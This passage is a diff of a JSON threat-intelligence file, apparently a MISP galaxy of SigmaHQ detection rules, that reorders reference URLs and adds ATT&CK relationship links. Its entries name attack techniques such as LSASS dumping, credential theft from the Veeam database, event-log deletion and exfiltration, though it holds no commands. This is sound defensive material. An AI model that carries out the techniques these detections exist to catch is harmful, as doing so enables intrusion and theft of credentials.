"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", "value": "SharpChisel Usage" }, @@ -49072,8 +63178,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml" ], "tags": [ 
@@ -49099,9 +63205,9 @@ "refs": [ "https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997", "http://blog.sevagas.com/?Hacking-around-HTA-files", - "https://twitter.com/mattifestation/status/1326228491302563846", "https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script", "https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356", + "https://twitter.com/mattifestation/status/1326228491302563846", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshta_execution.yml" ], "tags": [ @@ -49113,6 +63219,29 @@ "cve.2020.1599" ] }, + "related": [ + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "840a987a-99bd-4a80-a5c9-0cb2baa6cade", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", "value": "MSHTA Suspicious Execution 01" }, @@ -49160,6 +63289,29 @@ "attack.t1574.005" ] }, + "related": [ + { + "dest-uuid": "1b20efbf-8063-4fc3-a07d-b575318a301b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "70d81154-b187-45f9-8ec5-295d01255979", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", "value": "SharpUp PrivEsc Tool" }, 
@@ -49176,8 +63328,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://forums.veeam.com/veeam-backup-replication-f2/recover-esxi-password-in-veeam-t34630.html", "https://thedfirreport.com/2021/12/13/diavol-ransomware/", + "https://forums.veeam.com/veeam-backup-replication-f2/recover-esxi-password-in-veeam-t34630.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml" ], "tags": [ @@ -49185,6 +63337,15 @@ "attack.t1005" ] }, + "related": [ + { + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b57ba453-b384-4ab9-9f40-1038086b4e53", "value": "VeeamBackup Database Credentials Dump" }, @@ -49209,6 +63370,15 @@ "attack.t1047" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b53317a0-8acf-4fd1-8de8-a5401e776b96", "value": "WMI Uninstall An Application" }, @@ -49225,8 +63395,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Openwith.yml", "https://twitter.com/harr0ey/status/991670870384021504", + "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Openwith.yml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_openwith.yml" ], "tags": [ 
@@ -49234,6 +63404,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", "value": "OpenWith.exe Executes Specified Binary" }, @@ -49250,8 +63429,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html", + "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_default_accounts_manipulation.yml" ], @@ -49260,6 +63439,15 @@ "attack.t1560.001" ] }, + "related": [ + { + "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5b768e71-86f2-4879-b448-81061cbae951", "value": "Suspicious Manipulation Of Default Accounts" }, @@ -49276,8 +63464,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md", "https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_registered_com_objects.yml" ], "tags": [ 
@@ -49286,6 +63474,15 @@ "attack.t1546.015" ] }, + "related": [ + { + "dest-uuid": "bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f1edd233-30b5-4823-9e6a-c4171b24d316", "value": "Rundll32 Registered COM Objects" }, @@ -49333,6 +63530,15 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", "value": "Suspicious Splwow64 Without Params" }, @@ -49349,9 +63555,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", - "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", "https://twitter.com/jonasLyk/status/1555914501802921984", + "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml" ], "tags": [ @@ -49359,6 +63565,15 @@ "attack.t1564.004" ] }, + "related": [ + { + "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795", "value": "Use NTFS Short Name in Command Line" }, 
@@ -49375,8 +63590,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/Moriarty_Meng/status/984380793383370752", "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Powershell.yml", + "https://twitter.com/Moriarty_Meng/status/984380793383370752", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_powershell_script_from_input_stream.yml" ], "tags": [ @@ -49385,6 +63600,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", "value": "Run PowerShell Script from Redirected Input Stream" }, @@ -49436,6 +63660,22 @@ "attack.t1560.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "03e2746e-2b31-42f1-ab7a-eb39365b2422", "value": "Judgement Panda Exfil Activity" }, @@ -49461,6 +63701,15 @@ "attack.t1106" ] }, + "related": [ + { + "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "18cf6cf0-39b0-4c22-9593-e244bdc9a2d4", "value": "TA505 Dropper Load Pattern" }, 
@@ -49487,6 +63736,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cdf05894-89e7-4ead-b2b0-0a5f97a90f2f", "value": "Encoded PowerShell Command Line" }, @@ -49566,6 +63824,22 @@ "attack.t1036.005" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3711eee4-a808-4849-8a14-faf733da3612", "value": "Greenbug Campaign Indicators" }, @@ -49590,6 +63864,15 @@ "attack.t1070.004" ] }, + "related": [ + { + "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "379fa130-190e-4c3f-b7bc-6c8e834485f3", "value": "Windows Cmd Delete File" }, @@ -49606,8 +63889,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.001/T1218.001.md", "https://eqllib.readthedocs.io/en/latest/analytics/b25aa548-7937-11e9-8f5c-d46d6d62a49e.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.001/T1218.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_chm.yml" ], "tags": [ 
@@ -49615,6 +63898,15 @@ "attack.t1218.001" ] }, + "related": [ + { + "dest-uuid": "a6937325-9321-4e2e-bb2b-3ed2d40b2a9d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "68c8acb4-1b60-4890-8e82-3ddf7a6dba84", "value": "HH.exe Execution" }, @@ -49642,6 +63934,29 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "84e02621-8fdf-470f-bd58-993bb6a89d91", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", "value": "PowerShell DownloadFile" }, @@ -49658,8 +63973,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_modification.yml" ], "tags": [ 
@@ -49683,8 +63998,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/secedit", + "https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_secedit.yml" ], "tags": [ 
@@ -49709,6 +64024,71 @@ "attack.t1082" ] }, + "related": [ + { + "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "379809f6-2fac-42c1-bd2e-e9dee70b27f8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3731fbcd-0e43-47ae-ae6c-d15e510f0d42", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "8c4aef43-48d5-49aa-b2af-c0cd58d30c3d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f63fe421-b1d1-45c0-b8a7-02cd16ff2bed", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "22522668-ddf6-470b-a027-9d6866679f67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "43881e51-ac74-445b-b4c6-f9f9e9bf23fe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b8cfed42-6a8a-4989-ad72-541af74475ec", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c2c76b77-32be-4d1f-82c9-7e544bdfe0eb", "value": "Potential Suspicious Activity Using SeCEdit" }, 
@@ -49735,6 +64115,15 @@ "attack.t1218.007" ] }, + "related": [ + { + "dest-uuid": "365be77f-fc0e-42ee-bac8-4faf806d9336", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6f4191bb-912b-48a8-9ce7-682769541e6d", "value": "Suspicious Msiexec Execute Arbitrary DLL" }, @@ -49759,6 +64148,15 @@ "attack.resource_development" ] }, + "related": [ + { + "dest-uuid": "edadea33-549c-4ed1-9783-8f5a5853cbdf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ff23ffbc-3378-435e-992f-0624dcf93ab4", "value": "PurpleSharp Indicator" }, @@ -49775,8 +64173,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.exploit-db.com/exploits/37525", "https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection", + "https://www.exploit-db.com/exploits/37525", "https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_taskkill_sep.yml" ], @@ -49799,8 +64197,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set", "https://twitter.com/malwrhunterteam/status/1372536434125512712/photo/2", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bcdedit.yml" ], "tags": [ 
@@ -49908,6 +64306,15 @@ "attack.t1204" ] }, + "related": [ + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0acaad27-9f02-4136-a243-c357202edd74", "value": "Ryuk Ransomware Command Line Activity" }, @@ -49924,8 +64331,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/powershell/persistence/userland/schtasks.py", "https://github.com/0xdeadbeefJERKY/PowerSploit/blob/8690399ef70d2cad10213575ac67e8fa90ddf7c3/Persistence/Persistence.psm1", + "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/powershell/persistence/userland/schtasks.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powersploit_empire_schtasks.yml" ], "tags": [ @@ -49940,6 +64347,22 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "56c217c3-2de2-479b-990f-5c109ba8458f", "value": "Default PowerSploit and Empire Schtasks Persistence" }, @@ -49964,6 +64387,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2c28c248-7f50-417a-9186-a85b223010ee", "value": "Wscript Shell Run In CommandLine" }, 
@@ -49980,10 +64412,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", + "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", "https://twitter.com/cglyer/status/1355171195654709249", - "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_security_product_uninstall.yml" ], "tags": [ @@ -50016,6 +64448,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "534f2ef7-e8a2-4433-816d-c91bccde289b", "value": "Explorer NOUACCHECK Flag" }, @@ -50044,6 +64485,15 @@ "car.2013-05-009" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5afee48e-67dd-4e03-a783-f74259dcf998", "value": "Suspicious Use of Procdump on LSASS" }, 
@@ -50062,10 +64512,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/", - "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe", "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services", "https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6", + "https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/", + "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe", "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml" ], @@ -50074,6 +64524,15 @@ "attack.t1567" ] }, + "related": [ + { + "dest-uuid": "40597f16-0963-4249-bf4c-ac93b7fb9807", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e290b10b-1023-4452-a4a9-eb31a9013b3a", "value": "LOLBAS Data Exfiltration by DataSvcUtil.exe" }, @@ -50105,6 +64564,22 @@ "attack.t1071.004" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", "value": "Chafer Activity" }, 
@@ -50129,6 +64604,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d", "value": "Gpg4Win Decrypt Files From Suspicious Locations" }, @@ -50169,8 +64653,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf", "https://lolbas-project.github.io/lolbas/Binaries/Psr/", + "https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psr_capture_screenshots.yml" ], @@ -50218,11 +64702,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", - "https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html", - "https://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1482/T1482.md", + "https://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/", + "https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html", "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", + "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_trust_discovery.yml" ], "tags": [ 
@@ -50230,6 +64714,15 @@ "attack.t1482" ] }, + "related": [ + { + "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3bad990e-4848-4a78-9530-b427d854aac0", "value": "Domain Trust Discovery" }, @@ -50246,8 +64739,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf", "https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/", + "https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_ke3chang_regadd.yml" ], "tags": [ @@ -50308,6 +64801,22 @@ "attack.t1071" ] }, + "related": [ + { + "dest-uuid": "9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "440a56bf-7873-4439-940a-1c8a671073c2", "value": "GALLIUM Sha1 Artefacts" }, @@ -50335,6 +64844,22 @@ "car.2013-07-002" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1012f107-b8f1-4271-af30-5aed2de89b39", "value": "Terminal Service Process Spawn" }, 
@@ -50352,9 +64877,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.poweradmin.com/paexec/", "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", - "https://www.poweradmin.com/paexec/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_flags.yml" ], "tags": [ @@ -50362,6 +64887,15 @@ "attack.t1587.001" ] }, + "related": [ + { + "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "207b0396-3689-42d9-8399-4222658efc99", "value": "PsExec/PAExec Flags" }, @@ -50404,8 +64938,8 @@ "logsource.product": "windows", "refs": [ "https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf", - "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/", "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", + "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_bloopers_cmd.yml" ], "tags": [ @@ -50413,6 +64947,15 @@ "attack.t1059.003" ] }, + "related": [ + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "647c7b9e-d784-4fda-b9a0-45c565a7b729", "value": "Operator Bloopers Cobalt Strike Commands" }, 
@@ -50437,6 +64980,22 @@ "attack.t1564.003" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "cbb66055-0325-4111-aca0-40547b6ad5b0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", "value": "Covenant Launcher Indicators" }, @@ -50464,6 +65023,15 @@ "attack.t1070.001" ] }, + "related": [ + { + "dest-uuid": "6495ae23-3ab4-43c5-a94f-5638a2c31fd2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cd1f961e-0b96-436b-b7c6-38da4583ec00", "value": "Disable or Delete Windows Eventlog" }, @@ -50506,9 +65074,9 @@ "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/8e22486b-5edc-4cef-821c-373e945f296c/", + "https://app.any.run/tasks/388d5802-aa48-4826-b069-250420504758/", "https://inquest.net/blog/2018/06/22/a-look-at-formbook-stealer", "https://app.any.run/tasks/62bb01ae-25a4-4180-b278-8e464a90b8d7/", - "https://app.any.run/tasks/388d5802-aa48-4826-b069-250420504758/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_formbook.yml" ], "tags": [ @@ -50516,6 +65084,15 @@ "attack.t1587.001" ] }, + "related": [ + { + "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0", + "tags": [ + 